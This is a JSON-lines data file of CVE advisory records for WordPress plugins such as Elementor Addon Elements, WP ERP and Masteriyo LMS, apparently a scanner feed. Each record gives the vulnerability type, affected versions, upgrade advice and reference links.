{"CVE_ID":"CVE-2015-10109","slug":"video-playlist-and-gallery-plugin","versionEndExcluding":"1.137","description":"A vulnerability was found in Video Playlist and Gallery Plugin up to 1.136 on WordPress. It has been rated as problematic. Affected by this issue is some unknown functionality of the file wp-media-cincopa.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 1.137 is able to address this issue. The name of the patch is ee28e91f4d5404905204c43b7b84a8ffecad932e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230264.","recommendation":"Update to version 1.137, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/video-playlist-and-gallery-plugin\\\/releases\\\/tag\\\/1.137\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/video-playlist-and-gallery-plugin\\\/releases\\\/tag\\\/1.137\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/video-playlist-and-gallery-plugin\\\/commit\\\/ee28e91f4d5404905204c43b7b84a8ffecad932e\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/video-playlist-and-gallery-plugin\\\/commit\\\/ee28e91f4d5404905204c43b7b84a8ffecad932e\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230264\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230264\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230264\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230264\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8902","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.8","versionEndExcluding":"1.13.9","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.8 via the render_column function in modules\/data-table\/widgets\/data-table.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.13.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7317ecf5-d43d-4080-ad2a-7644764dd41e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7317ecf5-d43d-4080-ad2a-7644764dd41e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3163899\\\/addon-elements-for-elementor-page-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3163899\\\/addon-elements-for-elementor-page-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4838","slug":"clean-login","versionEndExcluding":"1.13.7","description":"The Clean Login WordPress plugin before 1.13.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9937e369-60e8-451c-8790-1a83a59115fc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9937e369-60e8-451c-8790-1a83a59115fc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4401","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.5","versionEndExcluding":"1.13.6","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 and 'eae_slider_animation' parameters in all versions up to, and including, 1.13.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.13.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecfc1466-41d2-498b-8210-c67e8550f5b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecfc1466-41d2-498b-8210-c67e8550f5b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/animated-text\\\/widgets\\\/animated-text.php#L358\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/animated-text\\\/widgets\\\/animated-text.php#L358\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/bg-slider\\\/module.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/bg-slider\\\/module.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107074#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107074#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107074#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107074#file7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4570","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.5","versionEndExcluding":"1.13.6","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in versions up to, and including, 1.13.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.13.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5f43c0-83d3-4d09-becd-a3552bebd609?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5f43c0-83d3-4d09-becd-a3552bebd609?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13.4\\\/classes\\\/helper.php#L232\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13.4\\\/classes\\\/helper.php#L232\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107074\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107074\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4569","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.5","versionEndExcluding":"1.13.6","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in versions up to, and including, 1.13.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.13.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ef7383-d684-473b-aa0f-45027ef245f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ef7383-d684-473b-aa0f-45027ef245f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1060\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107074\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107074\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5863","slug":"easy-image-collage","versionImpact":"1.13.5","versionEndExcluding":"1.13.6","description":"The Easy Image Collage plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the ajax_image_collage() function in all versions up to, and including, 1.13.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to erase all of the content in arbitrary posts.","recommendation":"Update to version 1.13.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceeefc3f-1cb7-48df-9978-258f015d93c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceeefc3f-1cb7-48df-9978-258f015d93c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106714\\\/easy-image-collage\\\/tags\\\/1.13.6\\\/helpers\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106714\\\/easy-image-collage\\\/tags\\\/1.13.6\\\/helpers\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0908","slug":"advanced-post-block","versionImpact":"1.13.4","versionEndExcluding":"1.13.5","description":"The Advanced Post Block \u2013 Display Posts, Pages, or Custom Posts on Your Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the apbPosts() function hooked via an AJAX action in all versions up to, and including, 1.13.1. This makes it possible for unauthenticated attackers to retrieve all post data, including those that may be password protected.","recommendation":"Update to version 1.13.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fb6c221-d885-42b5-977c-39e8608e3e31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fb6c221-d885-42b5-977c-39e8608e3e31?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-post-block\\\/trunk\\\/plugin.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-post-block\\\/trunk\\\/plugin.php#L173\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1623","slug":"custom-post-type-ui","versionEndExcluding":"1.13.5","description":"The Custom Post Type UI WordPress plugin before 1.13.5 does not properly check for CSRF when sending the debug information to a user supplied email, which could allow attackers to make a logged in admin send such information to an arbitrary email address via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a04d3808-f4fc-4d77-a1bd-be623cd7053e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a04d3808-f4fc-4d77-a1bd-be623cd7053e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0166","slug":"woocommerce-products-slider","versionEndExcluding":"1.13.42","description":"The Product Slider for WooCommerce by PickPlugins WordPress plugin before 1.13.42 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f5d43062-4ef3-4dd1-b916-0127f0016f5c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f5d43062-4ef3-4dd1-b916-0127f0016f5c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3743","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.3","versionEndExcluding":"1.13.4","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Stack Group, Shape Separator, Content Switcher, Info Circle and Timeline widgets in all versions up to, and including, 1.13.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36fea15-0475-45ee-b913-790db6373aef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36fea15-0475-45ee-b913-790db6373aef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/bg-slider\\\/module.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/bg-slider\\\/module.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/shape-separator\\\/shapes\\\/triangle-bottom-right.php#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/shape-separator\\\/shapes\\\/triangle-bottom-right.php#L1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/info-circle\\\/skins\\\/skin-base.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/info-circle\\\/skins\\\/skin-base.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/timeline\\\/skins\\\/skin-base.php#L1363\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/timeline\\\/skins\\\/skin-base.php#L1363\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078419%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3077362%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078419%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3077362%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2092","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.3","versionEndExcluding":"1.13.4","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Twitter Widget in all versions up to, and including, 1.13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67790c0b-c078-4955-a175-977a695392fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67790c0b-c078-4955-a175-977a695392fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/twitter\\\/widgets\\\/twitter.php#L712\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/twitter\\\/widgets\\\/twitter.php#L712\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077362%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3058768%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077362%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3058768%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12812","slug":"erp","versionImpact":"1.13.3","versionEndExcluding":"1.13.4","description":"The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting WordPress plugin before 1.13.4 has an issue where employees can manipulate parameters to access the data of terminated employees.","recommendation":"Update to version 1.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/757e76fd-830f-4d1c-8b89-dfad7c9c1f37\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/757e76fd-830f-4d1c-8b89-dfad7c9c1f37\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12808","slug":"erp","versionImpact":"1.13.3","versionEndExcluding":"1.13.4","description":"The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting WordPress plugin before 1.13.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1f823f5-d0f1-45a5-85c2-60208d76366e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1f823f5-d0f1-45a5-85c2-60208d76366e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10008","slug":"learning-management-system","versionImpact":"1.13.3","versionEndExcluding":"1.13.4","description":"The Masteriyo LMS \u2013 eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to unauthorized user profile modification due to missing authorization checks on the \/wp-json\/masteriyo\/v1\/users\/$id REST API endpoint in all versions up to, and including, 1.13.3. This makes it possible for authenticated attackers, with student-level access and above, to modify the roles of arbitrary users. As a result, attackers can escalate their privileges to the Administrator and demote existing administrators to students.","recommendation":"Update to version 1.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c54166e-2af2-409d-8c67-9c07f2028543?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c54166e-2af2-409d-8c67-9c07f2028543?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learning-management-system\\\/tags\\\/1.13.3\\\/\\\/includes\\\/RestApi\\\/Controllers\\\/Version1\\\/UsersController.php#L1726\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learning-management-system\\\/tags\\\/1.13.3\\\/\\\/includes\\\/RestApi\\\/Controllers\\\/Version1\\\/UsersController.php#L1726\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10000","slug":"learning-management-system","versionImpact":"1.13.3","versionEndExcluding":"1.13.4","description":"The Masteriyo LMS \u2013 eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the question's content parameter in all versions up to, and including, 1.13.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with student-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/575f103e-cfc7-4efd-a592-658a3e919671?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/575f103e-cfc7-4efd-a592-658a3e919671?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learning-management-system\\\/tags\\\/1.13.3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learning-management-system\\\/tags\\\/1.13.3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1173","slug":"erp","versionImpact":"1.13.1","versionEndExcluding":"1.13.2","description":"The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter in all versions up to, and including, 1.13.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with accounting manager or admin access, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.13.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94772de9-6ab8-45ff-8b56-19b50a81b66f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94772de9-6ab8-45ff-8b56-19b50a81b66f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/erp\\\/trunk\\\/modules\\\/accounting\\\/includes\\\/functions\\\/people.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/erp\\\/trunk\\\/modules\\\/accounting\\\/includes\\\/functions\\\/people.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071807\\\/erp\\\/trunk\\\/modules\\\/accounting\\\/includes\\\/functions\\\/people.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071807\\\/erp\\\/trunk\\\/modules\\\/accounting\\\/includes\\\/functions\\\/people.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10585","slug":"iwp-client","versionImpact":"1.13.0","versionEndExcluding":"1.13.1","description":"The InfiniteWP Client plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.13.0 via the 'historyID' parameter of the ~\/debug-chart\/index.php file. This makes it possible for unauthenticated attackers to read .txt files outside of the intended directory.","recommendation":"Update to version 1.13.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/iwp-client\\\/tags\\\/1.13.0\\\/debug-chart\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/iwp-client\\\/tags\\\/1.13.0\\\/debug-chart\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202851\\\/iwp-client\\\/trunk\\\/debug-chart\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202851\\\/iwp-client\\\/trunk\\\/debug-chart\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d2518f6-3647-4bee-a98c-ce7f30375a62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d2518f6-3647-4bee-a98c-ce7f30375a62?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6666","slug":"erp","versionImpact":"1.13.0","versionEndExcluding":"1.13.1","description":"The WP ERP plugin for WordPress is vulnerable to SQL Injection via the \u2018vendor_id\u2019 parameter in all versions up to, and including, 1.13.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Accounting Manager access (erp_ac_view_sales_summary capability) and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.13.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e23335c9-0830-4c6b-8e0d-6897a7176ba5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e23335c9-0830-4c6b-8e0d-6897a7176ba5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3064874\\\/erp\\\/tags\\\/1.13.1\\\/modules\\\/accounting\\\/includes\\\/functions\\\/transactions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3064874\\\/erp\\\/tags\\\/1.13.1\\\/modules\\\/accounting\\\/includes\\\/functions\\\/transactions.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1358","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","versionEndExcluding":"1.13","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.12.12 via the render function. This makes it possible for authenticated attackers, with contributor access or higher, to include the contents of arbitrary PHP files on the server, which may expose sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20cd3fff-0488-4bc2-961b-2427925e6a96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20cd3fff-0488-4bc2-961b-2427925e6a96?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037925\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/shape-separator\\\/widgets\\\/shape-separator.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037925\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/shape-separator\\\/widgets\\\/shape-separator.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/shape-separator\\\/widgets\\\/shape-separator.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/shape-separator\\\/widgets\\\/shape-separator.php#L89\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4312","slug":"soccer-engine-lite","versionImpact":"1.12","versionEndExcluding":"1.13","description":"The Soccer Engine \u2013 Soccer Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12. This is due to missing or incorrect nonce validation when saving match and team settings. This makes it possible for unauthenticated attackers to change plugin settings as well as teams, players, etc. via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081944%40soccer-engine-lite%2Ftrunk&old=3066918%40soccer-engine-lite%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081944%40soccer-engine-lite%2Ftrunk&old=3066918%40soccer-engine-lite%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57e84624-98ab-495b-b985-908302527b3a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57e84624-98ab-495b-b985-908302527b3a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
